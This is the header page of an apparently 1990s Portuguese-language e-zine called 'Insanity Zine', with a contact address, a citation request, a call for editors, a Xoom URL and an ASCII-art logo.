WORMBOY-skiller@imagelink.com.br

POR FAVOR, SE VOCE FOR COPIAR ALGUM TEXTO INSIRA A SEGUINTE LINHA
(INSANITY ZINE,EDICAO XX,AUTOR:XXXX)

ATENCAO!!!:PROCURAM-SE EDITORES PRA ESSA ZINE, SE VOCE SABE BASTANTE SOBRE 
ALGUM DESSES ASSUNTOS, MAIL-US


                    ++++++++++++++++++++++++++++++++++++
+++++++++++++++++++ http://members.xoom.com/insanityzine +++++++++++++++++++
                    ++++++++++++++++++++++++++++++++++++ 

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

III  NN      NN  SSSSSSSSS    AAA    NN      NN  III  TTTTTTTT  YY      YY
III  NNN     NN  SS          AA AA   NNN     NN  III     TT      YY    YY
III  NN NN   NN  SS         AA   AA  NN NN   NN  III     TT       YY  YY
III  NN  NN  NN  SSSSSSSSS  AA   AA  NN  NN  NN  III     TT         YY
III  NN   NN NN  SSSSSSSSS  AAAAAAA  NN   NN NN  III     TT         YY
III  NN    NNNN         SS  AA   AA  NN    NNNN  III     TT         YY
III  NN     NNN  SSSSSSSSS  AA   AA  NN     NNN  III     TT         YY

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

